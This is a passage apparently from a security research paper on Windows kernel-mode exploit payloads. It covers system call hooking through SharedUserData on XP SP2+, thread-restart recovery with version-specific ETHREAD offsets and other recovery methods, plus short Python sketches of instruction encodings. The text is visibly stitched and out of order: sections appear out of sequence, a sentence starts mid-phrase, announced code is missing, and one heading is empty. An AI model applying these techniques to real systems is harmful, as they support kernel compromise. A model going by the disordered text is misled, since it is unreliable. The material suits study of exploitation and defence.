5. Hooking on XP SP2+
If the operating system version is XP SP2 or later, hooking is accomplished by
overwriting the function pointer found at offset 0x300 within SharedUserData.
Prior to overwriting the function pointer, the original function pointer
must be saved and an indirect jmp instruction must be appended to the
copied R3 payload so that system calls can still be processed. The original
function pointer can be saved to 0xffdf0308 which is currently defined
as being used for padding. The jmp instruction can therefore indirectly
acquire the original system call dispatcher address from 0x7ffe0308.
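The version check and the two restore sequences described in the steps above can be sketched in Python against a modelled copy of the SharedUserData page. This is an offline illustration under stated assumptions: the page contents, the example pointer value, and the function names are hypothetical, and the instruction bytes are hand-assembled encodings of the instructions named in the text.

```python
import struct

SYSTEMCALL_OFFSET = 0x300        # offset of the system call code or pointer
MOV_EDX_ESP = b"\x8b\xd4"        # reads back as the word 0xd48b


def is_xp_sp0_sp1(page: bytes) -> bool:
    """True if offset 0x300 starts with mov edx, esp (the XP SP0/SP1 form)."""
    (word,) = struct.unpack_from("<H", page, SYSTEMCALL_OFFSET)
    return word == 0xD48B


def restore_trailer(page: bytes) -> bytes:
    """Bytes to append to the copied R3 payload so system calls still work."""
    if is_xp_sp0_sp1(page):
        # mov edx, esp / mov ecx, 0x7ffe0302 / jmp ecx
        return MOV_EDX_ESP + b"\xb9" + struct.pack("<I", 0x7FFE0302) + b"\xff\xe1"
    # jmp dword [0x7ffe0308]: indirect jump through the saved original pointer
    return b"\xff\x25" + struct.pack("<I", 0x7FFE0308)


# Modelled pages: SP0/SP1 holds code at 0x300, SP2+ holds a function pointer.
sp1_page = bytearray(0x1000)
sp1_page[0x300:0x302] = MOV_EDX_ESP
sp2_page = bytearray(0x1000)
struct.pack_into("<I", sp2_page, 0x300, 0x7C90EB8B)   # hypothetical pointer value

sp1_trailer = restore_trailer(sp1_page)
sp2_trailer = restore_trailer(sp2_page)
```

The SP0/SP1 trailer re-executes the two bytes that the short jump overwrote and resumes at 0x7ffe0302, while the SP2+ trailer relies on the original pointer having been saved at offset 0x308 beforehand.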
The following code illustrates an implementation of this type of staging payload.
It’s roughly 68 bytes in size, excluding the R3 payload and the recovery method.
4.3 Recovery
recovery payloads and identifies scenarios in which they may be most useful.
4.3.1 Thread Spinning
If any one of these conditions is not true, the act of spinning or otherwise
blocking the thread from continuing normal execution could lead to a deadlock. If the
setting is right, though, this method is perfectly acceptable. If the approach
described by eEye is used, it will require the resolution of nt!KeDelayExecutionThread
at a minimum, but could also require the resolution of nt!KeYieldExecution
depending on how robust the recovery method is intended to be. The fact that
this requires symbol resolution means that the payload will jump significantly
in size if it does not already involve the resolution of symbols.
Type: R0 Recovery
Size: 2 bytes
Compat: All
Migration: May be required
Requirements: No held locks
An alternative approach is to just spin the calling thread at PASSIVE_LEVEL.
If the conditions are right, this should not lead to a deadlock, but it is likely
that performance will be adversely affected. The benefit is that it does not
increase the size of the payload by much, considering such an approach can be
implemented in two bytes:
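As a worked illustration of how a spin can fit in two bytes, the Python sketch below encodes an x86 short jump whose target is its own first byte. This is one common encoding and is an assumption about what such a payload looks like, not necessarily the authors' exact listing; the helper name spin_stub is hypothetical.

```python
def spin_stub() -> bytes:
    """Encode a short jump (EB rel8) that targets its own first byte."""
    # rel8 is measured from the end of the two-byte instruction, so
    # jumping back to the start needs a displacement of -2 (0xFE).
    rel = -2
    return bytes([0xEB, rel & 0xFF])
```

The result is the two-byte sequence EB FE, which matches the size quoted for this recovery method.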
4.3.2 Throwing an Exception
Type: R0 Recovery
Size: 3 bytes
Compat: All
Migration: Not necessary
Requirements: No held locks in wrapped frame
If a vulnerability occurs in the context of a frame that is wrapped in an
exception handler, it may be possible to simply trigger an exception that will allow
execution to continue like normal. Unfortunately, the chances of this recovery
method being usable are very slim considering most vulnerabilities are likely to
occur outside of the context of an exception wrapped frame. The usability of
this approach can be tested fairly simply by triggering the overflow in such a
way as to cause an exception to be thrown. If the machine does not crash, it
could be the case that the vulnerability occurred in a function that is wrapped
by an exception handler. Assuming this is the case, writing a payload that
simply triggers an exception is fairly trivial.
4.3.3 Thread Restart
Type: R0 Recovery
Size: 41 bytes
Compat: 2000, XP
Migration: May be required
Requirements: No held locks
If a vulnerability occurs in the context of a system worker thread, it may be
possible to cause the thread to restart execution at its entry point without any
major adverse side effects. This avoids the issue of having to restore normal
execution for the context of the current call frame. To accomplish this, the
StartAddress must be extracted from the calling thread’s ETHREAD structure.
Due to the fact that this relies on the use of undocumented fields, it follows
that portability could be a problem. The following table shows the offsets to
the StartAddress routine for different operating system versions:
Platform            StartAddress Offset   Stack Restore Offset
Windows 2000 SP4    0x230                 0x254
Windows XP SP0      0x224                 0x250
Windows XP SP2      0x224                 0x250
A payload that implements this approach, and that should be compatible with all of
the offsets described above, is shown below [5]:
This implementation works by first obtaining the current thread context through
fs:0x124. Once obtained, a check is performed to see which operating system
the payload is running on by looking at the NtMinorVersion attribute of the
KUSER_SHARED_DATA structure. This check is necessary because the offsets
needed to obtain the StartAddress of the thread and the offset that is needed
when restoring the stack are different depending on which operating system is
being used. After resolving the StartAddress and adjusting the stack pointer
to reflect what it would have been when the function was originally called, all
that’s required is to transfer control to the StartAddress.
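The version-dependent lookup described above can be modeled as a small table keyed by NtMinorVersion. The Python sketch below is illustrative only and runs offline; the names RestartOffsets and restart_offsets are hypothetical, and it assumes that a minor version of 0 corresponds to Windows 2000 and 1 to Windows XP. The offset values are the ones listed in the table for this section.

```python
from typing import NamedTuple


class RestartOffsets(NamedTuple):
    start_address: int  # offset of StartAddress within ETHREAD
    stack_restore: int  # offset used when restoring the stack pointer


# Keyed by NtMinorVersion.
# Assumption: minor version 0 is Windows 2000 and 1 is Windows XP.
OFFSETS_BY_MINOR_VERSION = {
    0: RestartOffsets(start_address=0x230, stack_restore=0x254),  # 2000 SP4
    1: RestartOffsets(start_address=0x224, stack_restore=0x250),  # XP SP0/SP2
}


def restart_offsets(nt_minor_version: int) -> RestartOffsets:
    """Look up the version-specific offsets, refusing unknown versions."""
    try:
        return OFFSETS_BY_MINOR_VERSION[nt_minor_version]
    except KeyError:
        raise ValueError(
            f"no known offsets for minor version {nt_minor_version}"
        ) from None
```

Failing on an unknown version, rather than falling back to a default, reflects the portability concern: a wrong offset would read an unrelated ETHREAD field instead of StartAddress.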
This approach, at least in this specific implementation, may be closely tied to
vulnerabilities that occur in system worker thread routines, specifically those
that start at nt!ExpWorkerThread. However, the principles could be applied
to other system worker threads if the illustrated implementation proves limited.
It is also important to realize that since this method depends on undocumented
version-specific offsets, it may well not be portable to new
versions of the kernel. This approach should also be compatible with Windows
2003 Server SP0/SP1, but the offsets are likely to be different and have not been
obtained or tested at this point.
[5] Testing was only performed on XP SP0.
4.3.4 Lock Release
Judging from some of the other recovery methods described in this document,
it can be seen that one of the biggest limiting factors has to do with locks being
held when recovery is attempted. To deal with this problem, one would have to
implement a solution that was capable of releasing held locks prior to using a
recovery method. This is more of a theoretical solution than a concrete one, but
if it were possible to release locks held by a thread prior to recovery, then it would
be possible to use some of the more elegant recovery methods. As it stands,
though, the authors are not aware of a feasible solution to this problem that is
capable of releasing the various types of locks in a general manner. Instead, it
would most likely be better to attack this problem on a per-vulnerability basis
rather than attempting to come up with an all-encompassing solution.
Without a proper lock releasing solution, it is likely that even if a vulnerability
can be triggered, the box may deadlock. Again, this is highly dependent on the
vulnerability in question, but it should not be dismissed as a purely
academic concern.
4.4 Stages
Chapter 5
Conclusion
This document has illustrated some of the general techniques that can be used
when implementing kernel-mode payloads. Examples have been provided for
techniques that can be used to locate the base address of nt and an example
routine has been provided to illustrate symbol resolution. To make kernel-mode
payloads easier to grasp, their anatomy has been broken down into four distinct
units that have been referred to as payload components. These four payload
components can be combined together to form a logical kernel-mode payload.
The purpose of the migration payload component is to transition the processor
to a safe IRQL so that the rest of the payload can be executed. In some cases,
it’s also necessary to make use of a stager payload component in order to move
the payload to another thread context or location for the purpose of execution.
Once the payload is at a safe IRQL and has been staged as necessary, the actual
meat of the payload can be run. This portion of the payload is symbolically
referred to as the stage payload component. After everything is said and done,
the kernel-mode payload has to find some way to ensure that the kernel does
not crash. To accomplish this, a situational recovery payload component can
be used to allow the kernel to continue to execute properly.
While the vectors taken to achieve code execution have not been described in
this document, it is expected that there will continue to be research and
improvements in this field. A cycle similar to that seen for user-mode vulnerabilities can
be equally expected in the kernel-mode arena once enough interest is gained.
With the eyes of security vendors intently focused on solving the problem of
user-mode software vulnerabilities, the kernel-mode arena will be a playground
ripe for research and discovery.
Bibliography